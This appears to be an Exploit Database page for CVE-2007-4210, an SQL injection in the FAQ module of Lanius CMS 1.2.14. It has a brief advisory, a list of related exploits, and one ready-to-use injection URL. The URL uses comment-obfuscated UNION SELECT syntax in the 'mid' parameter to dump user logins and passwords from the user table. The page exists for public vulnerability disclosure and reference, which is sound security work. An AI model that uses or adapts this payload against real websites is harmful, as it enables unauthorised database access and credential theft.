Exploit Database - Logo

Lanius CMS 1.2.14 FAQ Module - 'mid' SQL Injection

EDB-ID: 30448 Author: k1tk4t Published: 2007-08-03
CVE: CVE-2007-4210 Type: Webapps Platform: PHP
Aliases: N/A Advisory/Source: Link Tags: N/A
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: Download Vulnerable Application
« Previous Exploit Next Exploit » 
source: http://www.securityfocus.com/bid/25193/info

LANAI CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

LANAI CMS 1.2.14 is vulnerable; other versions may also be affected. 

http://www.example.com/module.php?modname=faq&mf=faqviewgroup&mid=1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,userLogin,userPassword,5,6,7/**/FROM/**/tbl_ln_user/*
« Previous Exploit Next Exploit »

Related Exploits

Trying to match CVEs (1): CVE-2007-4210
Trying to match OSVDBs (1): 36438
Trying to match setup file: bde41a31e1b055ec78c97e0945b0a4b0
Other Possible E-DB Search Terms: Lanius CMS 1.2.14 FAQ Module,  Lanius CMS
Date D V Title Author
2007-08-06 Verified Lanius CMS 1.2.14 - Multiple SQL Injectionsk1tk4t
2007-08-03 Verified Lanius CMS 1.2.14 EZSHOPINGCART Module - 'cid' SQL Injectionk1tk4t
2007-08-03 Verified Lanius CMS 1.2.14 GALLERY Module - 'gid' SQL Injectionk1tk4t
2008-05-14 Verified Lanius CMS 1.2.16 - 'FCKeditor' Arbitrary File UploadEgiX
2009-04-07 Verified Lanius CMS 0.5.2 - Arbitrary File UploadEgiX
Menu